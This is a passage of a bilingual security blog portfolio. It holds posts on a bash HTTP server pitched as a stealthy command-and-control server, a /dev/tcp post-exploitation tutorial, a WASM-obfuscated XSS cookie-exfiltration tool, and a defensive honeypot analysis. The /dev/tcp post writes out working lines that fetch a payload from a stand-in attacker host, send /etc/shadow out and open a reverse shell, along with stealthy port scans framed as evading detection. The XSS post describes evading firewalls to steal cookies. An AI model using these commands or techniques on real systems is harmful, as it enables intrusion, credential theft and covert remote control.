    line=$(echo $line | tr -d '\r\n')
    [ -z "$line" ] && break
done

# Raw HTTP response!
echo -e "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nConnection: close\r\n\r\n"
echo -e "<h1>Welcome to the Ghost Server</h1><p>Zero NPM. Zero Python. Just Bash.</p>"

[ 0x04 ] START AND FORGET

Make it executable, enable it, and you're done:

chmod +x /usr/local/bin/ghost-server.sh
systemctl enable --now ghost-http.socket

You can curl localhost:8080. It works like a charm. Why is this useful? For red teams, it's an absurdly stealthy C2 (Command and Control) or payload server. For infra, it's an incredibly safe and lightweight way to serve internal metrics or status panels that consume no resources when no one is looking.

[ 0x05 ] BASIC ROUTING IN BASH

Serving a static page is cool, but what if we want to serve dynamic files based on the URL? The $request we captured has everything we need. We can extract the route (e.g., /api/data) with awk or pure bash:

route=$(echo "$request" | awk '{print $2}')

if [ "$route" == "/api/status" ]; then
    echo -e "HTTP/1.1 200 OK
Content-Type: application/json

"
    echo "{ "status": "ghosting", "load": $(cat /proc/loadavg | awk '{print $1}') }"
elif [[ "$route" == *.json ]]; then
    file="."$route
    if [ -f "$file" ]; then
        echo -e "HTTP/1.1 200 OK
Content-Type: application/json

"
        cat "$file"
    else
        echo -e "HTTP/1.1 404 Not Found

"
    fi
else
    echo -e "HTTP/1.1 403 Forbidden

"
fi

Boom, you just reinvented Express.js using shell script. And surprisingly, this can take a beating.

[ 0x06 ] LIMITATIONS AND PERFORMANCE

Will this handle Amazon's Black Friday traffic? Of course not. SystemD spawns a new bash process for every connection. Doing 1000 concurrent requests means 1000 bash processes spawning and dying. The average latency is around 5ms, but the CPU suffers from the cost of context-switching and process creation if there's overload.

However, for internal APIs, invisible callbacks (webhooks) for C2s, and remote systems administration (where the load is low), it is the most silent and elegant solution possible. The admin who opens top or htop will hardly suspect short instances of /bin/bash running across the system (since the entire OS already does this naturally). Sometimes, the best tool isn't installing more packages, but using what the operating system already gives you on a silver platter.

#linux #systemd #bash #minimalism #http

OPEN_STANDALONE_FILE

Red Team 2026-03-12 @reeshasx

RECON_WITHOUT_TOOLS: Exploiting /dev/tcp for Stealth Exfiltration

Como fazer requisições HTTP e port scans usando puro Bash quando você pega um shell capado e não tem curl ou nmap.

[ 0x00 ] A CENA DO CRIME

Imagine o cenário: você finalmente consegue aquele sonhado RCE (Remote Code Execution) num container ou servidor mal configurado. Você manda aquele whoami e vê que é root. A adrenalina bate. Aí você vai baixar o seu rootkit ou script de exfiltração:

$ wget http://meu-c2.com/payload.sh
bash: wget: command not found
$ curl http://meu-c2.com/payload.sh
bash: curl: command not found
$ nc
bash: nc: command not found

O dev da empresa foi safo. Ele usou uma imagem Docker mega minimalista (tipo Alpine) e tirou todas as ferramentas úteis. E agora? Você chora? Não, você lembra que o Bash é maravilhoso e tem o /dev/tcp.

[ 0x01 ] MAGIA NEGRA DO KERNEL? NÃO, APENAS BASH

O diretório /dev/tcp não é um arquivo real no Linux. Ele é uma funcionalidade embutida diretamente no shell (Bash). Se você redirecionar dados para /dev/tcp/HOST/PORTA, o Bash magicamente abre um socket de rede pra você.

Vamos brincar de port scanner sem Nmap? Olha como é estupidamente simples testar se a porta 80 tá aberta num alvo:

if timeout 1 bash -c '</dev/tcp/10.0.0.5/80' &>/dev/null; then 
    echo "Porta 80 aberta meu rei"
fi

Faz um loop em for do 1 ao 1024 e você acabou de criar o port scanner mais minimalista do planeta. O Blue Team não vai ver um processo de nmap ou rustscan pipocando nos logs do EDR, só o próprio bash executando redirecionamentos normais.

[ 0x02 ] BAIXANDO ARQUIVOS (O CURL DO PARAGUAI)

Legal, posso escanear. Mas e pra baixar o meu malware? Pra isso, precisamos construir uma requisição HTTP "na mão". HTTP nada mais é do que enviar um texto pedindo um arquivo e ler a resposta.

Usando file descriptors (exec 3<>), a gente abre a conexão de leitura e escrita:

exec 3<>/dev/tcp/meu-c2.com/80
echo -e "GET /payload.sh HTTP/1.1\r\nHost: meu-c2.com\r\nConnection: close\r\n\r\n" >&3
cat <&3 > payload.sh

BUM! Seu payload tá no servidor. Sem usar nenhum binário adicional, usando 100% de funções built-in do shell. A chance de isso ser detectado por um antivírus que só monitora chamadas a ferramentas conhecidas é praticamente zero.

[ 0x03 ] EXFILTRANDO DADOS NO MODO STEALTH

Pegou a senha do banco de dados no /etc/shadow e quer mandar pra você? Inverte o processo. No seu servidor (C2) você deixa um netcat ouvindo: nc -lvnp 4444.

E na máquina vítima:

cat /etc/shadow > /dev/tcp/meu-c2.com/4444

Sim, é só isso. Um comando. Sem dependências, sem frescura. O /dev/tcp é o melhor amigo do hacker pós-exploração.

[ 0x04 ] PING SWEEPS SEM PING

Se o ICMP (ping) está bloqueado pelo firewall de saída, você não consegue mapear a rede interna. Certo? Errado. Você pode usar a mesma técnica da porta 80 para mapear a rede. Ao iterar pelo último octeto do IP (1 a 254) e testar portas comuns como 445 (SMB) ou 22 (SSH), você acha as outras máquinas da rede.

for ip in {1..254}; do
    timeout 0.2 bash -c "</dev/tcp/10.0.0.$ip/445" &>/dev/null && echo "Host 10.0.0.$ip está vivo!" &
done
wait

E como jogamos para background com o &, o scan inteiro da sub-rede /24 termina em menos de 1 segundo.

[ 0x05 ] O CLÁSSICO REVERSE SHELL

Não poderia terminar sem falar do payload mais famoso. Se você quer transformar esse RCE pontual num shell interativo na sua máquina:

bash -i >& /dev/tcp/meu-c2.com/9001 0>&1

Isso redireciona o stdin, stdout e stderr do Bash diretamente para a conexão socket. Você ganha controle total da máquina sem nunca ter "baixado" um binário malicioso. Apenas redirecionamentos mágicos do kernel. Da próxima vez que pegar um shell capado, não se desespere. O shell tem tudo o que você precisa.

[ 0x00 ] THE CRIME SCENE

Picture this: you finally get that sweet RCE (Remote Code Execution) on a misconfigured container or server. You type whoami and see you are root. Adrenaline spikes. Then you try to download your rootkit or exfil script:

$ wget http://my-c2.com/payload.sh
bash: wget: command not found
$ curl http://my-c2.com/payload.sh
bash: curl: command not found
$ nc
bash: nc: command not found

The dev was smart. They used an ultra-minimalist Docker image (like Alpine) and stripped all useful tools. What now? Do you cry? No, you remember that Bash is wonderful and has /dev/tcp.

[ 0x01 ] KERNEL BLACK MAGIC? NO, JUST BASH

The /dev/tcp directory isn't a real file in Linux. It's a feature built directly into the shell (Bash). If you redirect data to /dev/tcp/HOST/PORT, Bash magically opens a network socket for you.

Want to play port scanner without Nmap? Look how stupidly simple it is to test if port 80 is open on a target:

if timeout 1 bash -c '</dev/tcp/10.0.0.5/80' &>/dev/null; then 
    echo "Port 80 is open my king"
fi

Wrap that in a for loop from 1 to 1024 and you just created the most minimalist port scanner on the planet. The Blue Team won't see an nmap or rustscan process popping up in their EDR logs, just the bash shell executing normal file redirections.

[ 0x02 ] DOWNLOADING FILES (THE BOOTLEG CURL)

Cool, I can scan. But what about downloading my malware? For that, we need to build an HTTP request "by hand". HTTP is nothing more than sending some text asking for a file and reading the response.

Using file descriptors (exec 3<>), we open a read/write connection:

exec 3<>/dev/tcp/my-c2.com/80
echo -e "GET /payload.sh HTTP/1.1\r\nHost: my-c2.com\r\nConnection: close\r\n\r\n" >&3
cat <&3 > payload.sh

BOOM! Your payload is on the server. Without using any external binaries, using 100% built-in shell functions. The chance of this being caught by an antivirus that only monitors calls to known tools is practically zero.

[ 0x03 ] STEALTH EXFILTRATION

Grabbed the database password or /etc/shadow and want to send it to yourself? Reverse the process. On your server (C2) you leave a netcat listening: nc -lvnp 4444.

And on the victim machine:

cat /etc/shadow > /dev/tcp/my-c2.com/4444

Yeah, that's it. One command. No dependencies, no fuss. /dev/tcp is a post-exploitation hacker's best friend.

[ 0x04 ] PING SWEEPS WITHOUT PING

If ICMP (ping) is blocked by the outbound firewall, you can't map the internal network. Right? Wrong. You can use the same port 80 technique to map the network. By iterating through the last IP octet (1 to 254) and testing common ports like 445 (SMB) or 22 (SSH), you find the other machines on the network.

for ip in {1..254}; do
    timeout 0.2 bash -c "</dev/tcp/10.0.0.$ip/445" &>/dev/null && echo "Host 10.0.0.$ip is alive!" &
done
wait

And since we throw it to the background with &, the entire /24 subnet scan finishes in less than 1 second.

[ 0x05 ] THE CLASSIC REVERSE SHELL

I couldn't finish without mentioning the most famous payload. If you want to turn that single RCE into an interactive shell on your machine:

bash -i >& /dev/tcp/my-c2.com/9001 0>&1

This redirects the stdin, stdout and stderr of Bash directly to the socket connection. You gain full control of the machine without ever "downloading" a malicious binary. Just magical kernel redirections. Next time you land on a restricted shell, don't despair. The shell has everything you need.

#bash #networking #exfiltration #post-exploitation

OPEN_STANDALONE_FILE

Red Team 2026-02-06 @reeshasx

REESXSS_V1: O MOTOR DE OFUSCAÇÃO BINÁRIA (WASM + TINYGO)

Como usei WebAssembly e Go para criar um motor de ofuscação polimórfico que deixa qualquer WAF confuso.

[ 0x00 ] THE_EVAL_WARS

Se você já tentou injetar um <script>alert(1)</script> num campo de busca e o site te barrou com um erro 403, você encontrou seu primeiro WAF (Web Application Firewall). Esses caras são treinados para caçar palavras-chave como eval, cookie, e fetch.

A maioria dos hackers para por aí ou tenta um Base64 bobo. Mas aqui no reesXSS, é definitivamente diferente. Este projeto é a minha jornada para transformar um ataque web numa peça de engenharia binária indetectável.

[ 0x01 ] POR QUE WEBASSEMBLY? (THE BINARY SHIELD)

O problema do JavaScript é que ele é... bem, texto. Qualquer F12 revela sua estratégia. Mas o WebAssembly (WASM) mudou o jogo.

WASM é um bytecode. Quando você move a lógica de "desembaralhar" o código para um binário compilado, você cria uma Caixa Preta (Blackbox). O analista de segurança abre o console e vê um monte de números aleatórios e um blob binário. Ele não sabe se aquilo é um motor de jogo, um minerador de cripto ou, no nosso caso, um script de exfiltração de dados de elite.

[ 0x02 ] O MOTOR: TINYGO NO COMANDO

Para criar o core do reesXSS, eu usei TinyGo. Por que não Go puro? Porque o Go padrão embuti um runtime gigante (2MB+) no WASM. Para um payload XSS, isso é um elefante no meio da sala.

Com TinyGo, o binário fica com poucos KB. A lógica que implementei (decrypt_byte) faz rotação de bits, XOR dinâmico baseado no index e um salt matemático (0x1337). * Polimorfismo: Cada vez que você gera o payload, ele é diferente. Se o seu script tem 10 letras "a", no payload final elas viram 10 números totalmente distintos. Análise estatística? Morta.

[ 0x03 ] ARQUITETURA DO SISTEMA

O reesXSS não é só um gerador; é um sistema de Monitoramento e Exfiltração completo: 1. Backend (Python/Flask): O cérebro que gerencia as vítimas, salva os logs e serve o dashboard em tempo real. 2. Persistence (PostgreSQL): Nada de JSON no disco; usamos banco de dados real para lidar com milhares de requisições de exfiltração.

[ 0x04 ] O BLOCO "THE VOID" (ULTIMATE OBFUSCATION)

Para aqueles casos onde o WASM é bloqueado por políticas de segurança (CSP), eu criei o modo The Void. Ele usa Opaque Predicates — condições lógicas que sempre dão verdadeiro (como [] === []... mentira, essa dá falso, mas você entendeu a ideia kkk) mas que confundem completamente os scanners estáticos. Junte isso com Junk Code Injection e você tem um script que parece um labirinto infinito de lógica inútil protegendo o prêmio real no centro.

[ 0x05 ] CASO DE TESTE: BYPASSING LABS

Testar em ambiente controlado é fácil. O desafio foi o testphp.vulnweb.com. O limite de caracteres nos campos deles matava nossos payloads WASM embutidos (27k chars). * Solução: Implementei o WASM Ghost (External). O payload injetado é um loader de 150 caracteres que dá um fetch no binário /engine.wasm do meu servidor. Resultado? Conexão estabelecida e cookies capturados com sucesso.

[ 0x06 ] FINAL_LOGOUT

Este projeto me mostrou que a segurança web é um jogo de gato e rato. No momento que você cria uma barreira, alguém vai criar uma escada binária para pular. O reesXSS é o meu laboratório vivo para entender essas escadas.

Se você é desenvolvedor, a dica é: não confie em filtros de string. Sanitização Real é a única saída. Se você é entusiasta de segurança: o WASM é o futuro da ofuscação (e da detecção).

"If it runs in the browser, it can be hidden." — SYSTEM_ADMIN

[ 0x00 ] THE_EVAL_WARS

If you've ever tried to inject a <script>alert(1)</script> into a search field and the site blocked you with a 403 error, you met your first WAF (Web Application Firewall). These guys are trained to hunt for keywords like eval, cookie, and fetch.

Most hackers stop there or try a silly Base64 encode. This project is my journey to transform a web attack into an undetectable piece of binary engineering.

[ 0x01 ] WHY WEBASSEMBLY? (THE BINARY SHIELD)

The problem with JavaScript is that it's... well, text. Any F12 reveals your strategy. But WebAssembly (WASM) changed the game.

WASM is bytecode. When you move the "unscrambling" logic to a compiled binary, you create a Blackbox. The security analyst opens the console and sees a bunch of random numbers and a binary blob. They don't know if it's a game engine, a crypto miner, or, in our case, an elite data exfiltration script.

[ 0x02 ] THE ENGINE: TINYGO AT THE HELM

To create the reesXSS core, I used TinyGo. Why not pure Go? Because standard Go embeds a giant runtime (2MB+) into the WASM. For an XSS payload, that's an elephant in the room.

With TinyGo, the binary is only a few KB. The logic I implemented (decrypt_byte) uses bitwise rotation, dynamic XOR based on index, and a mathematical salt (0x1337). * Polymorphism: Every time you generate the payload, it's different. If your script has 10 "a" letters, in the final payload they turn into 10 totally distinct numbers. Statistical analysis? Dead.

[ 0x03 ] SYSTEM ARCHITECTURE

reesXSS isn't just a generator; it's a full Monitoring and Exfiltration system: 1. Backend (Python/Flask): The brain that manages victims, saves logs, and serves the real-time dashboard. 2. Persistence (PostgreSQL): No JSON on disk; we use a real database to handle thousands of exfiltration requests.

[ 0x04 ] "THE VOID" BLOCK (ULTIMATE OBFUSCATION)

For those cases where WASM is blocked by security policies (CSP), I created The Void mode. It uses Opaque Predicates — logical conditions that always evaluate to true (like [] === []... wait, that's false, but you get the idea lol) but completely confuse static scanners. Combine that with Junk Code Injection and you have a script that looks like an infinite maze of useless logic protecting the real prize at the center.

[ 0x05 ] TEST CASE: BYPASSING LABS

Testing in a controlled environment is easy. The challenge was testphp.vulnweb.com. The character limit in their fields killed our embedded WASM payloads (27k chars). * Solution: I implemented WASM Ghost (External). The injected payload is a 150-character loader that fetches the /engine.wasm binary from my server. Result? Connection established and cookies successfully captured.

[ 0x06 ] FINAL_LOGOUT

This project showed me that web security is a cat-and-mouse game. The moment you build a wall, someone will build a binary ladder to climb it. reesXSS is my living laboratory for understanding those ladders.

If you're a developer, the tip is: don't trust string filters. Real Sanitization is the only way out. If you're a security enthusiast: WASM is the future of obfuscation (and detection).

"If it runs in the browser, it can be hidden." — SYSTEM_ADMIN

#xss #wasm #tinygo #obfuscation #red-team #evasion

OPEN_STANDALONE_FILE

Blue Team 2026-01-28 @reeshasx

HEATMAP_ANALYSIS_V1 (Grafana + Loki Honeypot Analysis)

Padroes de ataques e visualizacao de ataques de um honeypot, o que isso fala para nos?

[ 0x00 ] INITIAL_LOG_BOOT

O que você está vendo no dashboard não é um mapa de "hackers de filme" digitando em telas verdes. É o ruído da internet. Se você levanta um IP público hoje, você não está mais "sozinho". Em menos de 60 segundos, algum script na China, na Rússia ou num datacenter em Ohio vai te encontrar e isso é o comum.

Este artigo é uma autópsia técnica do que esse calor vermelho realmente significa. A toca do coelho é feita de scripts automatizados e instâncias de nuvem mal configuradas.

[ 0x01 ] THE_CLOUD_ABUSE_BIAS

Aquele brilho intenso na Costa Leste dos EUA (regiões us-east-1) é o coração da AWS. Mas não se engane: não são os funcionários da Amazon te atacando.

O que acontece é o "Cloud-Hopping". Atacantes usam cartões de crédito clonados ou instâncias com vulnerabilidades de kernel para subir proxies de alta banda. Uma VPS de 5 dólares tem conexão de 1Gbps; seu roteador da Vivo tem... bem, você sabe. É muito mais eficiente escanear o IPv4 inteiro a partir de um backbone de datacenter do que de uma rede residencial. (A não ser que você tenha 1001 redes residenciais :p)

[ 0x02 ] THE_FLAP-D_PARADOX (EUROPE)

Londres, Amsterdã, Frankfurt, Paris e Dublin. O eixo FLAP-D é onde a internet europeia respira. A concentração de ataques aqui é puramente estatística: é onde estão os maiores IXPs (Internet Exchange Points) e os datacenters de baixa latência como Hetzner e OVH.

As botnets adoram esses caras porque a reputação do IP demora a cair. Eles conseguem disparar milhões de pacotes de brute-force antes que o provedor receba os primeiros reports de abuso e derrube a instância.

[ 0x03 ] THE_IOT_PLAGUE: MIRAI & BEYOND

Enquanto a nuvem foca em brute-force pesado, o calor no Sudeste Asiático e em São Paulo vem de algo mais... "sujo". Estamos falando de IoT Botnets.

Roteadores de padaria, câmeras IP baratas, DVRs que nunca viram um update de firmware. Malwares como Mirai, Aisuru e o recente P2PInfect (que usa exploits em Redis) transformam esses dispositivos em zumbis. Eles não têm a banda de uma AWS, mas têm o número. * Behavior: O bot entra, tenta senhas padrão (admin/admin, root/123456), se entrar, ele mata outros malwares que já estavam lá e "fecha a porta" pra ele. É uma guerra territorial pelo seu roteador.

[ 0x04 ] CASE_STUDY: SÃO_PAULO_CLUSTER

O Brasil é um dos maiores geradores de "ruído" do mundo. Em São Paulo, a densidade de conexões residenciais com configurações de segurança inexistentes é um prato cheio.

Nos nossos honeypots (Cowrie para SSH e Dionaea para malware), o primeiro hit de brute-force TCP geralmente vem em menos de 45 segundos. A maioria das tentativas foca em portas clássicas: 22 (SSH), 23 (Telnet), 3389 (RDP) e 5060 (SIP). Eles não querem seus arquivos; eles querem seu processamento para minerar Monero ou participar de um ataque DDOS massivo.

[ 0x05 ] THE_DEBUG_LOG (REAL_WORLD_EXFIL)

Aqui está o que é extraído de um ataque real. Esqueça nomes de usuários bonitinhos; os bots tentam o que é padrão em ambientes Ubuntu, Web e Admin.

No log abaixo, capturado em 2025-07-18, vemos um atacante de Hong Kong (47.238.151.234) usando libssh2_1.11.1 para realizar um brute-force em série. O tempo de conexão? Apenas 0.6 segundos. Isso indica um scanner em massa, automatizado para testar e descartar alvos em milissegundos.

2025-07-18T02:06:15+0000 [SSHTransport,47.238.151.234] login attempt [ubuntu/qwe123456] failed
2025-07-18T02:06:18+0000 [SSHTransport,47.238.151.234] login attempt [web/P@ssw0rd] failed
2025-07-18T02:07:09+0000 [SSHTransport,47.238.151.234] login attempt [adam/adam123] failed
2025-07-18T02:07:19+0000 [SSHTransport,47.238.151.234] login attempt [app/111111] failed
2025-07-18T02:07:50+0000 [SSHTransport,47.238.151.234] login attempt [demo/demo] failed

[ 0x06 ] ANOMALY_DETECTED: PUBLIC_KEY_ATTACK

Nem tudo é brute-force de senha. Atacantes mais avançados tentam injetar chaves públicas ou usar credenciais vazadas de repositórios expostos.

Recentemente, o IP 182.92.11.80 tentou uma conexão usando a public key para o usuário NL5xUDpV2xRa. O ataque foi tão agressivo ou mal-formado que chegou a causar um exceção interna no honeypot. Quando o atacante começa a tentar chaves específicas, o jogo muda: ele não está mais apenas batendo na porta; ele está tentando usar a chave mestre de um vazamento anterior.

[ 0x07 ] SURVIVAL_GUIDE: HARDENING_101

Não adianta chorar no Twitter/X. A internet é hostil. Se você quer parar de ser um "pontinho vermelho" no mapa de alguém, o checklist é obrigatório:

Kill Passwords: Se você usa senha no SSH, você já perdeu. Use Ed25519 Keys.
Move the Gate: Mudar a porta 22 para algo como 49152 ajuda? Sim, mas só contra scripts burros. Shodan vai te achar de qualquer jeito.
Active Defense: Instale CrowdSec. Ele é como um Waze para ataques: se um IP atacou alguém na rede deles, ele já chega banido no seu servidor.
Audit Your IoT: Se o seu roteador não recebe update desde 2021, ele não é um roteador, é um membro da botnet de alguém.

[ 0x08 ] MASSIVE_RECON: NMAP_ON_STEROIDS

Como que esses caras te acham em menos de 1 minuto? Simples: velocidade bruta.

Olha esse scan abaixo. Foram testados 4096 endereços IP em apenas 3.58 segundos. Usando taxas de pacotes agressivas (--min-rate 5000), um atacante consegue varrer sub-redes inteiras atrás de portas específicas (como a 25565 de Minecraft ou a 22 de SSH) em tempo recorde.

# sudo nmap -n -Pn -T5 --min-rate 5000 --open -p 25565 152.67.32.0/20 -vvvv
Scanning 4096 hosts [1 port/host]
Discovered open port 25565/tcp on 152.67.32.10
Discovered open port 25565/tcp on 152.67.34.19
Nmap done: 4096 IP addresses scanned in 3.58 seconds
Raw packets sent: 8175 (359.700KB) | Rcvd: 19 (928B)

Se você tem uma porta aberta, você é apenas um bit num scan de 3 segundos de alguém. Não é pessoal, é estatística.

[ 0x09 ] TARGET_ANALYSIS: VULNERABLE_TOMCAT_7.0.92

Depois que o scan termina, o atacante agora tem uma lista de IPs "vivos". Um exemplo real? O IP 152.67.33.53:8080 rodando um Apache Tomcat/7.0.92.

tomcat_vuln

Essa versão é um "parque de diversões" para o Red Team. Só de olhar o versionamento, já sabemos que ele está aberto para: 1. Ghostcat (CVE-2020-1938): Permite ler arquivos internos (configurações) via porta AJP (8009). 2. RCE via CGI Servlet (CVE-2019-0232): Se estiver em Windows, injeção de comandos via .bat. 3. Manager App: Versões antigas são alvos constantes de brute-force para upload de arquivos .war maliciosos (WebShell).

Encontrar o alvo demorou 3.70 segundos. O que vem depois é apenas execução técnica.

[ 0x0A ] FINAL_THOUGHTS

O mapa vermelho da internet não é sobre você. É sobre a exploração massiva de recursos computacionais. Entender que você está sendo escaneado neste exato momento não é paranoia.

A pergunta de ouro no Red/Blue Team não é se você vai ser invadido, é: "O quanto de barulho o atacante vai ter que fazer antes de eu dar um 'shutdown' na conexão dele?".

Fique seguro, use chaves, e pare de usar admin/admin pelo amor de Deus kkkkk.

heatmap

[ 0x00 ] INITIAL_LOG_BOOT

What you see on the dashboard isn't a "movie hacker" map with green screens. It's the noise of the internet. If you spin up a public IP today, you're no longer "alone". In less than 60 seconds, some script in China, Russia, or an Ohio datacenter will find you—and that's the norm.

This article is a technical autopsy of what this red heat actually means. The rabbit hole is made of automated scripts and misconfigured cloud instances.

[ 0x01 ] THE_CLOUD_ABUSE_BIAS

That intense glow on the US East Coast (us-east-1 regions) is the heart of AWS. But make no mistake: it's not Amazon employees attacking you.

What happens is "Cloud-Hopping". Attackers use cloned credit cards or instances with kernel vulnerabilities to spin up high-bandwidth proxies. A 5-dollar VPS has a 1Gbps connection; your home router... well, you know. It's much more efficient to scan the entire IPv4 space from a datacenter backbone than from a residential network. (Unless you have 1001 residential networks :p)

[ 0x02 ] THE_FLAP-D_PARADOX (EUROPE)

London, Amsterdam, Frankfurt, Paris, and Dublin. The FLAP-D axis is where the European internet breathes. The concentration of attacks here is purely statistical: it's where the largest IXPs (Internet Exchange Points) and low-latency datacenters like Hetzner and OVH are located.

Botnets love these providers because IP reputation takes time to drop. They can fire off millions of brute-force packets before the provider receives the first abuse reports and pulls the plug on the instance.

[ 0x03 ] THE_IOT_PLAGUE: MIRAI & BEYOND

While the cloud focuses on heavy brute-force, the heat in Southeast Asia and São Paulo comes from something... "dirtier". We're talking about IoT Botnets.

Bakery routers, cheap IP cameras, DVRs that haven't seen a firmware update in years. Malware like Mirai, Aisuru, and the recent P2PInfect (which targets Redis) turn these devices into zombies. They don't have AWS bandwidth, but they have numbers. * Behavior: The bot enters, tries default passwords (admin/admin, root/123456), and if it gets in, it kills other malware already there and "locks the door" for itself. It's a territorial war for your router.

[ 0x04 ] CASE_STUDY: SÃO_PAULO_CLUSTER

Brazil is one of the world's largest generators of "noise". In São Paulo, the density of residential connections with non-existent security settings is a goldmine.

On our honeypots (Cowrie for SSH and Dionaea for malware), the first TCP brute-force hit usually arrives in less than 45 seconds. Most attempts target classic ports: 22 (SSH), 23 (Telnet), 3389 (RDP), and 5060 (SIP). They don't want your files; they want your processing power to mine Monero or join a massive DDoS attack.

[ 0x05 ] THE_DEBUG_LOG (REAL_WORLD_EXFIL)

Here is what's extracted from a real attack. Forget pretty usernames; bots try what's standard in Ubuntu, Web, and Admin environments.

In the log below, captured on 2025-07-18, we see an attacker from Hong Kong (47.238.151.234) using libssh2_1.11.1 for serial brute-forcing. Connection time? Just 0.6 seconds. This indicates a mass scanner, automated to test and discard targets in milliseconds.

2025-07-18T02:06:15+0000 [SSHTransport,47.238.151.234] login attempt [ubuntu/qwe123456] failed
2025-07-18T02:06:18+0000 [SSHTransport,47.238.151.234] login attempt [web/P@ssw0rd] failed
2025-07-18T02:07:09+0000 [SSHTransport,47.238.151.234] login attempt [adam/adam123] failed
2025-07-18T02:07:19+0000 [SSHTransport,47.238.151.234] login attempt [app/111111] failed
2025-07-18T02:07:50+0000 [SSHTransport,47.238.151.234] login attempt [demo/demo] failed

[ 0x06 ] ANOMALY_DETECTED: PUBLIC_KEY_ATTACK

It's not all password brute-forcing. More advanced attackers try to inject public keys or use leaked credentials from exposed repositories.

Recently, IP 182.92.11.80 attempted a connection using a public key for user NL5xUDpV2xRa. The attack was so aggressive or malformed it caused an internal honeypot exception. When an attacker starts trying specific keys, the game changes: they're no longer just knocking on the door; they're trying to use a master key from a previous leak.

[ 0x07 ] SURVIVAL_GUIDE: HARDENING_101

No point crying on Twitter/X. The internet is hostile. If you want to stop being a "red dot" on someone's map, the checklist is mandatory:

Kill Passwords: If you're using passwords for SSH, you've already lost. Use Ed25519 Keys.
Move the Gate: Does changing port 22 to something like 49152 help? Yes, but only against dumb scripts. Shodan will find you anyway.
Active Defense: Install CrowdSec. It's like Waze for attacks: if an IP attacked someone in their network, it arrives at your server already banned.
Audit Your IoT: If your router hasn't seen an update since 2021, it's not a router; it's a member of someone's botnet.

[ 0x08 ] MASSIVE_RECON: NMAP_ON_STEROIDS

How do these guys find you in less than a minute? Simple: raw speed.

Check out the scan below. 4096 IP addresses were tested in just 3.58 seconds. Using aggressive packet rates (--min-rate 5000), an attacker can sweep entire subnets for specific ports (like Minecraft's 25565 or SSH's 22) in record time.

# sudo nmap -n -Pn -T5 --min-rate 5000 --open -p 25565 152.67.32.0/20 -vvvv
Scanning 4096 hosts [1 port/host]
Discovered open port 25565/tcp on 152.67.32.10
Discovered open port 25565/tcp on 152.67.34.19
Nmap done: 4096 IP addresses scanned in 3.58 seconds
Raw packets sent: 8175 (359.700KB) | Rcvd: 19 (928B)

If you have an open port, you're just a bit in someone's 3-second scan. It's not personal, it's statistics.

[ 0x09 ] TARGET_ANALYSIS: VULNERABLE_TOMCAT_7.0.92

Once the scan is done, the attacker has a list of "live" IPs. A real example? IP 152.67.33.53:8080 running Apache Tomcat/7.0.92.

tomcat_vuln

This version is a "playground" for Red Teamers. Just by looking at the versioning, we know it's vulnerable to: 1. Ghostcat (CVE-2020-1938): Allows reading internal files (configs) via the AJP port (8009). 2. RCE via CGI Servlet (CVE-2019-0232): Command injection via .bat if on Windows. 3. Manager App: Old versions are constant targets for brute-forcing to upload malicious .war files (WebShell).

Finding the target took 3.70 seconds. What follows is just technical execution.

[ 0x0A ] FINAL_THOUGHTS

The internet's red map isn't about you. It's about the mass exploitation of computing resources. Understanding that you're being scanned at this very moment isn't paranoia.

The gold question in Red/Blue Teaming isn't "if" you'll be breached, but: "How much noise will the attacker have to make before I shut down their connection?".

Stay safe, use keys, and for the love of God, stop using admin/admin lol.

heatmap

#blue team #honeypot #grafana #loki #heatmap #analysis

OPEN_STANDALONE_FILE

./ IDENTITY_OVERVIEW ● SYSTEM ACTIVE

./ EXECUTION_HISTORY [LOGS: 1]

Administrative Assistant

./ ARSENAL_KIT 7 SECTORS // 55 MODULES

./ ACTIVE_OPERATIONS 7 PAYLOADS LOADED

ReesXSS - Cyber Intelligence Platform

Automation using OCR and OMR

C2 TUI Trojan

Pure Linux HTTP Server

How to use /dev/tcp/

Massive Port Scanner + Grafana

Honeypot Dashboard

./ VULNERABILITY_DATABASE ● 4 RECORDS_FOUND

./ AUTHORIZATION_KEYS [VERIFIED: 3]

Ethical Hacking

Ethical Hacker

Endpoint Security

> COMMS_UPLINK ENCRYPTION: ENABLED ● SIGNAL_STABLE

EMAIL_RELAY

PROFESSIONAL_NET

SECURE_MESSAGE_DROP

TRANSMISSION_COMPLETE

TRANSMISSION_FAILED

> SYSTEM_KNOWLEDGE_BASE LIBRARY_V1.0.4

GHOST_IN_THE_RAM: Fileless Execution via memfd_create in Python

GHOST_IN_THE_RAM: Fileless Execution via memfd_create in Python

[ 0x00 ] A MORTE DO /tmp

[ 0x01 ] O QUE É MEMFD_CREATE?

[ 0x02 ] O LOADER EM PYTHON

[ 0x03 ] POR QUE ISSO É ASSUSTADOR?

[ 0x04 ] FORENSE E DETECÇÃO

[ 0x00 ] THE DEATH OF /tmp

[ 0x01 ] WHAT IS MEMFD_CREATE?

[ 0x02 ] THE PYTHON LOADER

[ 0x03 ] WHY IS THIS SCARY?

[ 0x04 ] FORENSICS AND DETECTION

WAF_EVASION_LOGS: Bypassing Enterprise Filters on High-Value Targets

WAF_EVASION_LOGS: Bypassing Enterprise Filters on High-Value Targets

[ 0x00 ] O MITO DA CAIXA INVIOLÁVEL

[ 0x01 ] DESYNC: QUEM ESTÁ LENDO O QUÊ?

[ 0x02 ] POLUIÇÃO DE PARÂMETROS (HPP)

[ 0x03 ] O CASO OPENRESTY

[ 0x04 ] MINDSET DE CAÇADOR

[ 0x05 ] TRANSFER-ENCODING: CHUNKED

[ 0x06 ] NORMALIZAÇÃO UNICODE

[ 0x00 ] THE MYTH OF THE IMPENETRABLE BOX

[ 0x01 ] DESYNC: WHO IS READING WHAT?

[ 0x02 ] HTTP PARAMETER POLLUTION (HPP)

[ 0x03 ] THE OPENRESTY CASE

[ 0x04 ] HUNTER MINDSET

[ 0x05 ] TRANSFER-ENCODING: CHUNKED

[ 0x06 ] UNICODE NORMALIZATION

GHOST_SERVERS: Implementing HTTP via SystemD Sockets & Bash

GHOST_SERVERS: Implementing HTTP via SystemD Sockets & Bash

[ 0x00 ] A GORDURA DOS SERVIDORES MODERNOS

[ 0x01 ] SYSTEMD SOCKET ACTIVATION

[ 0x02 ] O SERVIÇO FANTASMA

[ 0x03 ] O BASH COMO BACKEND DA WEB

[ 0x04 ] START AND FORGET

[ 0x05 ] ROTEOAMENTO BÁSICO NO BASH

[ 0x06 ] LIMITAÇÕES E PERFOMANCE

[ 0x00 ] THE FAT OF MODERN SERVERS

[ 0x01 ] SYSTEMD SOCKET ACTIVATION

[ 0x02 ] THE GHOST SERVICE

[ 0x03 ] BASH AS THE WEB BACKEND

